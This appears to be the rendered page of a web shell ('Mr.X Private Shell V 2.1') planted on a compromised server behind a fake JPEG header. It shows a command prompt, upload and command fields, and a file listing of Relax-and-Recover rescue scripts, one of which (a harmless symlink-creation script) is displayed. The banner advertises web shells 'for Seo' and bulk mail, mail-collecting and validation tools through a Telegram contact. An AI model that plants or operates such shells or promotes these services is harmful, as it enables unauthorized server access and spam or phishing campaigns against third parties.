����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
# 005_create_symlinks.sh
#
# create some symlinks for Relax-and-Recover
#
# This file is part of Relax-and-Recover, licensed under the GNU General
# Public License. Refer to the included COPYING for full text of license.

ln -sf $v bin/init $ROOTFS_DIR/init >&2
ln -sf $v bin $ROOTFS_DIR/sbin >&2
ln -sf $v bash $ROOTFS_DIR/bin/sh >&2
ln -sf $v true $ROOTFS_DIR/bin/pam_console_apply >&2 # RH/Fedora with udev needs this
ln -sf $v ../bin $ROOTFS_DIR/usr/bin >&2
ln -sf $v ../bin $ROOTFS_DIR/usr/sbin >&2
ln -sf $v /proc/self/mounts $ROOTFS_DIR/etc/mtab >&2

if [[ -d $ROOTFS_DIR/etc/sysconfig/network-scripts ]]; then
    ln -sf $v /bin/true $ROOTFS_DIR/etc/sysconfig/network-scripts/net.hotplug >&2
fi
[[ -x /sbin/hwup ]] && ln -sf $v true $ROOTFS_DIR/sbin/hwup >&2 # SUSE with udev needs this

# Only create LVM symlinks when the HOST system contains LVM
if hash lvm 2>/dev/null; then
    Log "Creating LVM binary symlinks"
    lvmbins="lvchange lvconvert lvcreate lvdisplay lvextend lvmchange lvmdiskscan lvmsadc lvmsar lvreduce lvremove lvrename lvresize lvs lvscan pvchange pvresize pvck pvcreate pvdata pvdisplay pvmove pvremove pvs pvscan vgcfgbackup vgcfgrestore vgchange vgck vgconvert vgcreate vgdisplay vgexport vgextend vgimport vgmerge vgmknodes vgreduce vgremove vgrename vgs vgscan vgsplit"
    for bin in $lvmbins; do
        ln -sf $v lvm $ROOTFS_DIR/bin/$bin >&2
    done
fi

Filemanager

Name Type Size Permission Actions
005_create_symlinks.sh File 1.36 KB 0644
090_create_lib_directories_and_symlinks.sh File 486 B 0644
100_copy_as_is.sh File 11.61 KB 0644
110_touch_empty_files.sh File 401 B 0644
130_create_dotfiles.sh File 2.19 KB 0644
150_adjust_permissions.sh File 213 B 0644
390_copy_binaries_libraries.sh File 7.63 KB 0644
400_copy_modules.sh File 17.66 KB 0644
420_copy_firmware_files.sh File 2.92 KB 0644
450_symlink_mingetty.sh File 266 B 0644
600_verify_and_adjust_udev.sh File 4.11 KB 0644
610_verify_and_adjust_udev_systemd.sh File 1.53 KB 0644
620_verify_os_release_file.sh File 453 B 0644
630_simplify_systemd_reboot_halt_poweroff_shutdown.sh File 3.06 KB 0644
630_verify_resolv_conf_file.sh File 6 KB 0644
640_verify_lvm_conf.sh File 1.18 KB 0644